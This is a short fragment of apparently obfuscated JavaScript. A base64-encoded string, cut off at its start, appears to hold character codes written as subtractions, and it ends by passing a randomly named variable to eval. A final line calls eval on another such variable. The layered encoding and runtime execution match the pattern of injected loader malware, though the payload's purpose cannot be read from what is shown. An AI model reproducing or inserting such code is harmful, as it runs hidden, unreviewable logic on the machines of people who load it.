ywgMTE1IC0gNCwgMTAxIC0gMSwgMTA3IC0gNiwgNzAgLSA1LCAxMjUgLSA5LCA0NyAtIDcsIDEwOCAtIDMsIDM0IC0gMiwgMzkgLSAyLCAzMyAtIDEsIDExNSAtIDgsIDEwNiAtIDUsIDEyNyAtIDYsIDU0IC0gOCwgMTEyIC0gNCwgMTA0IC0gMywgMTE0IC0gNCwgMTA1IC0gMiwgMTIxIC0gNSwgMTA4IC0gNCwgNDUgLSA0LCA0MyAtIDIsIDY1IC0gNiwgMTkgLSA5LCA0MCAtIDgsIDM0IC0gMiwgMTI2IC0gMSwgMTIgLSAyLCAzNSAtIDMsIDM4IC0gNiwgMTE3IC0gMywgMTA5IC0gOCwgMTIyIC0gNiwgMTIzIC0gNiwgMTIyIC0gOCwgMTEzIC0gMywgMzQgLSAyLCAxMTcgLSAzLCAxMDMgLSAyLCAxMjQgLSA5LCA2OCAtIDksIDE0IC0gNCwgMTMzIC0gOCwgMTggLSA4LCAxOCAtIDgsIDExOSAtIDEsIDEwMCAtIDMsIDExNyAtIDMsIDQwIC0gOCwgMTA4IC0gOCwgMTAyIC0gMSwgMTA1IC0gNiwgMzMgLSAxLCA2MyAtIDIsIDM1IC0gMywgMTI4IC0gOCwgMTE4IC0gNywgMTE3IC0gMywgMTAzIC0gOCwgMTA0IC0gMywgMTE4IC0gOCwgMTAwIC0gMSwgNDYgLSA2LCA5OSAtIDIsIDEyMCAtIDQsIDExNSAtIDQsIDEwMCAtIDIsIDQzIC0gMywgMTA1IC0gNCwgMTEzIC0gMywgMTA2IC0gNywgMTA5IC0gOCwgMTAxIC0gMSwgNDYgLSA1LCA0NSAtIDEsIDM0IC0gMiwgMTEwIC0gMywgMTA3IC0gNiwgMTI4IC0gNywgNDggLSA3LCA2NyAtIDgsIDE1IC0gNSwgNDYgLSA2LCAxMTIgLSAyLCAxMDIgLSAxLCAxMjUgLSA2LCAzNiAtIDQsIDczIC0gMywgMTIzIC0gNiwgMTE2IC0gNiwgMTAwIC0gMSwgMTIxIC0gNSwgMTEwIC0gNSwgMTE4IC0gNywgMTExIC0gMSwgNDMgLSAzLCAxMDMgLSAzLCAxMTAgLSA5LCAxMDQgLSA1LCA0NiAtIDUsIDQ3IC0gNiwgNDQgLSA0LCA0MiAtIDEsIDYyIC0gMywgMTUgLSA1LCAxOSAtIDkpO2V2YWwoTkxTRE1CUVhFSik7’);
eval(OJCQZPVISJ);